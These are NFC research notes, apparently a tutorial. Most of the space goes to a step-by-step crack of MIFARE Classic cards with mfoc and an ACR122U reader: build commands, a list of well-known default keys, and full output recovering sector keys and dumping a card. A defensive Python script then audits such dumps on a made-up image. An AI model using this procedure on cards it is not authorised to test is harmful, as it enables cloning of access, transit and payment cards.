NFC Research
1 Overview
NFC (Near Field Communication) is a short-range wireless communication technology. It lets electronic devices exchange data contactlessly and point-to-point within about ten centimetres (3.9 inches).
The technology evolved from RFID and was jointly developed by Philips Semiconductors (now NXP Semiconductors), Nokia and Sony; it builds on RFID and interconnection technology.
Near-field communication is a short-range, high-frequency radio technology operating at 13.56 MHz over distances of up to 20 cm. Three transfer rates are defined: 106 kbit/s, 212 kbit/s and 424 kbit/s.
NFC has been standardised as ISO/IEC IS 18092, ECMA-340 and ETSI TS 102 190.
NFC is backward compatible with RFID: it integrates a contactless reader, a contactless card and peer-to-peer functionality into a single chip. Put simply, NFC is the evolved form of RFID.
2 Devices
- ACS ACR122U
  - widely used NFC reader (USB interface)
- Phones with NFC
  - Meizu MX3
  - Oppo Find 5
  - Xiaomi 2A, Xiaomi 3
  - SONY Xperia V LT25i
  - Samsung Galaxy Note 3, Galaxy Note 2, Galaxy Note, Galaxy S2, Galaxy S3, Galaxy S4
  - Nokia Lumia 720, Lumia 820, Lumia 920, Lumia 925, Lumia 928 and Lumia 1020
- proxmark3
3 Operating modes
Card emulation mode: in this mode the device behaves like an IC card based on RFID technology. It can replace the large number of IC cards in use today (including credit cards) in settings such as paying in shops, EasyCard transit cards, access control, travel tickets, event tickets and so on. One major advantage of this mode is that the card is powered by the RF field of the contactless reader, so it keeps working even when the host device (such as a phone) has no battery power.
Peer-to-peer mode (P2P mode): similar to infrared, used for data exchange, but with a shorter range, faster connection setup, higher throughput and low power consumption (Bluetooth is similar). Linking two NFC-capable devices allows point-to-point data transfer, such as downloading music, exchanging pictures or synchronising address books.
Reader/writer mode: the device acts as a contactless reader, for example reading the balance and transaction history of a municipal transit card, or reading information from an electronic tag on a poster or exhibition display.
4 Decoding
Mifare 1 S50 (1K EEPROM) and Mifare 1 S70 (4K EEPROM) were fully broken long ago; the newest deployments all use Mifare DESFire.
Hardware: ACR122U, around 200 RMB
Software: open-source tools
- key scanning: mfoc http://code.google.com/p/mfoc/
- brute-forcing one sector's key: mfcuk http://code.google.com/p/mfcuk/
- Mifare Classic card helper tool: mfterm https://github.com/4ZM/mfterm
- core support library: libnfc http://code.google.com/p/libnfc/
1. Build
$ wget http://libnfc.googlecode.com/files/libnfc-1.7.0.tar.bz2
$ tar jxf libnfc-1.7.0.tar.bz2
$ cd libnfc-1.7.0
$ ./configure   # the default ACR122U driver is acr122_usb, which talks to the reader over USB directly instead of going through the PCSC middleware via the acr122_pcsc driver
$ make
$ sudo make install
$ wget http://mfoc.googlecode.com/files/mfoc-0.10.6.tar.gz && tar -xvzf mfoc-0.10.6.tar.gz
$ cd mfoc-0.10.6
$ ./configure
$ make
$ sudo make install
$ git clone git://github.com/4ZM/mfterm
$ cd mfterm
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install
mfcuk is built the same way; if a library is missing during the build, install it.
2. Cracking
Confirm that the system detects the ACR122U:
$ nfc-list
nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d
error	libnfc.driver.acr122_usb	Unable to claim USB interface (Operation not permitted)
nfc-list: ERROR: Unable to open NFC device: acr122_usb:001:009
$ sudo nfc-list
nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d
NFC device: ACS / ACR122U PICC Interface opened
This does not work inside a VMware virtual machine; it keeps failing with an "Unable to write USB interface" error.
Start scanning the keys of all sectors:
$ sudo mfoc -P 500 -O dump.card.file
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00 02
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): 25 55 aa 10
      SAK (SEL_RES): 18
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 4K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 4K, Security level 1
* SmartMX with MIFARE 4K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [........................................]
[Key: a0a1a2a3a4a5] -> [/.......................................]
[Key: d3f7d3f7d3f7] -> [/.......................................]
[Key: 000000000000] -> [/.......................................]
[Key: b0b1b2b3b4b5] -> [/.......................................]
[Key: 4d3a99c351dd] -> [/.......................................]
[Key: 1a982c7e459a] -> [/.......................................]
[Key: aabbccddeeff] -> [/.......................................]
[Key: 714c5c886e97] -> [/.......................................]
[Key: 587ee5f9350f] -> [/.......................................]
[Key: a0478cc39091] -> [/.......................................]
[Key: 533cb6c723f6] -> [/.......................................]
[Key: 8fd0a4f256e9] -> [/.......................................]
Sector 00 - FOUND_KEY   [A]
Sector 00 - UNKNOWN_KEY [B]
Sector 01 - UNKNOWN_KEY [A]
Sector 01 - UNKNOWN_KEY [B]
Sector 02 - UNKNOWN_KEY [A]
Sector 02 - UNKNOWN_KEY [B]
Sector 03 - UNKNOWN_KEY [A]
Sector 03 - UNKNOWN_KEY [B]
Sector 04 - UNKNOWN_KEY [A]
Sector 04 - UNKNOWN_KEY [B]
Sector 05 - UNKNOWN_KEY [A]
Sector 05 - UNKNOWN_KEY [B]
Sector 06 - UNKNOWN_KEY [A]
Sector 06 - UNKNOWN_KEY [B]
Sector 07 - UNKNOWN_KEY [A]
Sector 07 - UNKNOWN_KEY [B]
Sector 08 - UNKNOWN_KEY [A]
Sector 08 - UNKNOWN_KEY [B]
Sector 09 - UNKNOWN_KEY [A]
Sector 09 - UNKNOWN_KEY [B]
Sector 10 - UNKNOWN_KEY [A]
Sector 10 - UNKNOWN_KEY [B]
Sector 11 - UNKNOWN_KEY [A]
Sector 11 - UNKNOWN_KEY [B]
Sector 12 - UNKNOWN_KEY [A]
Sector 12 - UNKNOWN_KEY [B]
Sector 13 - UNKNOWN_KEY [A]
Sector 13 - UNKNOWN_KEY [B]
Sector 14 - UNKNOWN_KEY [A]
Sector 14 - UNKNOWN_KEY [B]
Sector 15 - UNKNOWN_KEY [A]
Sector 15 - UNKNOWN_KEY [B]
Sector 16 - UNKNOWN_KEY [A]
Sector 16 - UNKNOWN_KEY [B]
Sector 17 - UNKNOWN_KEY [A]
Sector 17 - UNKNOWN_KEY [B]
Sector 18 - UNKNOWN_KEY [A]
Sector 18 - UNKNOWN_KEY [B]
Sector 19 - UNKNOWN_KEY [A]
Sector 19 - UNKNOWN_KEY [B]
Sector 20 - UNKNOWN_KEY [A]
Sector 20 - UNKNOWN_KEY [B]
Sector 21 - UNKNOWN_KEY [A]
Sector 21 - UNKNOWN_KEY [B]
Sector 22 - UNKNOWN_KEY [A]
Sector 22 - UNKNOWN_KEY [B]
Sector 23 - UNKNOWN_KEY [A]
Sector 23 - UNKNOWN_KEY [B]
Sector 24 - UNKNOWN_KEY [A]
Sector 24 - UNKNOWN_KEY [B]
Sector 25 - UNKNOWN_KEY [A]
Sector 25 - UNKNOWN_KEY [B]
Sector 26 - UNKNOWN_KEY [A]
Sector 26 - UNKNOWN_KEY [B]
Sector 27 - UNKNOWN_KEY [A]
Sector 27 - UNKNOWN_KEY [B]
Sector 28 - UNKNOWN_KEY [A]
Sector 28 - UNKNOWN_KEY [B]
Sector 29 - UNKNOWN_KEY [A]
Sector 29 - UNKNOWN_KEY [B]
Sector 30 - UNKNOWN_KEY [A]
Sector 30 - UNKNOWN_KEY [B]
Sector 31 - UNKNOWN_KEY [A]
Sector 31 - UNKNOWN_KEY [B]
Sector 32 - UNKNOWN_KEY [A]
Sector 32 - UNKNOWN_KEY [B]
Sector 33 - UNKNOWN_KEY [A]
Sector 33 - UNKNOWN_KEY [B]
Sector 34 - UNKNOWN_KEY [A]
Sector 34 - UNKNOWN_KEY [B]
Sector 35 - UNKNOWN_KEY [A]
Sector 35 - UNKNOWN_KEY [B]
Sector 36 - UNKNOWN_KEY [A]
Sector 36 - UNKNOWN_KEY [B]
Sector 37 - UNKNOWN_KEY [A]
Sector 37 - UNKNOWN_KEY [B]
Sector 38 - UNKNOWN_KEY [A]
Sector 38 - UNKNOWN_KEY [B]
Sector 39 - UNKNOWN_KEY [A]
Sector 39 - UNKNOWN_KEY [B]

Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 15105 .....
Sector: 1, type A, probe 1, distance 15147 .....
  Found Key: A [2c5a3710d3a5]
Sector: 2, type A, probe 0, distance 15147 .....
  Found Key: A [c3a4fa8db109]
Sector: 3, type A, probe 0, distance 15147 .....
  Found Key: A [3c34515b11d4]
Sector: 4, type A, probe 0, distance 15149 .....
  Found Key: A [0725a08f31e6]
Sector: 5, type A, probe 0, distance 15151 .....
  Found Key: A [5601f83644bb]
Sector: 6, type A, probe 0, distance 15149 .....
Sector: 6, type A, probe 1, distance 15149 .....
Sector: 6, type A, probe 2, distance 15149 .....
  Found Key: A [20f2bf55ac1a]
Sector: 7, type A, probe 0, distance 15147 .....
  Found Key: A [dd77fb8c3736]
Sector: 8, type A, probe 0, distance 15149 .....
Sector: 8, type A, probe 1, distance 15147 .....
  Found Key: A [c2180972c580]
Sector: 9, type A, probe 0, distance 15151 .....
  Found Key: A [742c582e8c04]
Sector: 10, type A, probe 0, distance 15151 .....
Sector: 10, type A, probe 1, distance 15193 .....
Sector: 10, type A, probe 2, distance 15151 .....
  Found Key: A [db338f92bb98]
Sector: 11, type A, probe 0, distance 15151 .....
  Found Key: A [15559907e873]
Sector: 12, type A, probe 0, distance 15151 .....
  Found Key: A [c8313c454d2a]
Sector: 13, type A, probe 0, distance 15149 .....
Sector: 13, type A, probe 1, distance 15149 .....
  Found Key: A [c896c22e5b3e]
Sector: 14, type A, probe 0, distance 15149 .....
  Found Key: A [72558e3fe66c]
Sector: 15, type A, probe 0, distance 15151 .....
  Found Key: A [aec383ce3c12]
......
......
When it finishes, the whole card's data is written to the file dump.card.file.
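The file mfoc writes with -O is a raw image of the card's memory, and the same image is what a card issuer would review to judge how weak a deployment is: sectors still protected by one of the well-known default keys listed in the run above are readable by anyone with a reader, and a sector trailer whose access-bit complements do not match is corrupted or was personalised incorrectly. The following Python script is an added example written for these notes; it is not part of mfoc or libnfc. It assumes the dump is raw card memory as 16-byte blocks in card order (1 KB = 64 blocks, 4 KB = 256 blocks) with the recovered keys placed in the sector trailers, which is the layout mfoc produces. The sample image built by build_sample_dump() is constructed for the demonstration and is not a real card; its keys are made-up values.

```python
"""Audit a MIFARE Classic dump for weak configuration.

Added example for these notes; not part of mfoc or libnfc.
Assumption: the dump is raw card memory, 16-byte blocks in card order
(1K = 64 blocks, 4K = 256 blocks), with recovered keys placed in the
sector trailers, which is the layout mfoc -O writes.
"""
from dataclasses import dataclass

BLOCK = 16

# Well-known default keys (the set mfoc tried in the run above). A sector
# still protected by one of these is readable with any off-the-shelf reader.
DEFAULT_KEYS = {bytes.fromhex(k) for k in (
    "ffffffffffff", "a0a1a2a3a4a5", "d3f7d3f7d3f7", "000000000000",
    "b0b1b2b3b4b5", "4d3a99c351dd", "1a982c7e459a", "aabbccddeeff",
    "714c5c886e97", "587ee5f9350f", "a0478cc39091", "533cb6c723f6",
    "8fd0a4f256e9",
)}


@dataclass
class Finding:
    sector: int
    issue: str


def sector_layout(size):
    """Return (sector, first_block, block_count) tuples for a 1K or 4K image.

    1K: 16 sectors of 4 blocks. 4K: 32 sectors of 4 blocks, then 8 of 16.
    """
    if size == 1024:
        return [(s, s * 4, 4) for s in range(16)]
    if size == 4096:
        return ([(s, s * 4, 4) for s in range(32)]
                + [(32 + i, 128 + i * 16, 16) for i in range(8)])
    raise ValueError(f"unsupported dump size: {size} bytes")


def bcc_ok(block0):
    """Block 0: bytes 0-3 are the 4-byte UID, byte 4 is its XOR checksum (BCC)."""
    uid, bcc = block0[:4], block0[4]
    x = 0
    for b in uid:
        x ^= b
    return x == bcc


def access_bits_consistent(trailer):
    """Bytes 6-8 of a trailer hold the C1/C2/C3 nibbles and their complements.

    Byte 6 = ~C2 | ~C1, byte 7 = C1 | ~C3, byte 8 = C3 | C2 (high | low nibble).
    A mismatch means the trailer is corrupted or was written with bad bits.
    """
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    return ((b6 & 0xF) == ((b7 >> 4) ^ 0xF)        # ~C1 against C1
            and (b6 >> 4) == ((b8 & 0xF) ^ 0xF)    # ~C2 against C2
            and (b7 & 0xF) == ((b8 >> 4) ^ 0xF))   # ~C3 against C3


def audit_dump(dump):
    """Return a list of Findings: default keys, bad access bits, bad BCC."""
    findings = []
    if not bcc_ok(dump[:BLOCK]):
        findings.append(Finding(0, "manufacturer block BCC does not match UID"))
    for sector, first, count in sector_layout(len(dump)):
        trailer_block = first + count - 1
        trailer = dump[trailer_block * BLOCK:(trailer_block + 1) * BLOCK]
        key_a, key_b = trailer[:6], trailer[10:16]
        if key_a in DEFAULT_KEYS:
            findings.append(Finding(sector, "key A is a well-known default"))
        if key_b in DEFAULT_KEYS:
            findings.append(Finding(sector, "key B is a well-known default"))
        if not access_bits_consistent(trailer):
            findings.append(Finding(sector, "access bits inconsistent"))
    return findings


def build_sample_dump():
    """Constructed 1K image for the demo; not a real card, keys are made up."""
    transport = bytes.fromhex("ff078069")          # factory access bits
    default = bytes.fromhex("ffffffffffff")
    blocks = [bytes(BLOCK)] * 64
    # Manufacturer block: UID 25 55 aa 10, BCC, SAK 08, ATQA 00 04, filler.
    uid = bytes.fromhex("2555aa10")
    blocks[0] = (uid + bytes([uid[0] ^ uid[1] ^ uid[2] ^ uid[3]])
                 + bytes.fromhex("080400") + bytes(8))
    for s in range(16):                            # every sector factory-default
        blocks[s * 4 + 3] = default + transport + default
    # Sector 1: personalised keys (constructed values), valid access bits.
    blocks[7] = bytes.fromhex("112233445566") + transport + bytes.fromhex("0123456789ab")
    # Sector 2: personalised keys, but one complement nibble is wrong.
    blocks[11] = (bytes.fromhex("112233445566") + bytes.fromhex("ff0f8069")
                  + bytes.fromhex("0123456789ab"))
    return b"".join(blocks)


if __name__ == "__main__":
    for f in audit_dump(build_sample_dump()):
        print(f"sector {f.sector:2d}: {f.issue}")
```

On the constructed image the audit reports both keys of sector 0 and of sectors 3 to 15 as defaults, sector 2 as having inconsistent access bits, and nothing for sector 1. To run it on a real dump, replace build_sample_dump() with open("dump.card.file", "rb").read(); key B only appears in the image where the access bits make it readable or mfoc recovered it, so a zero key B is a hint to check the trailer's access conditions rather than proof of a weak key.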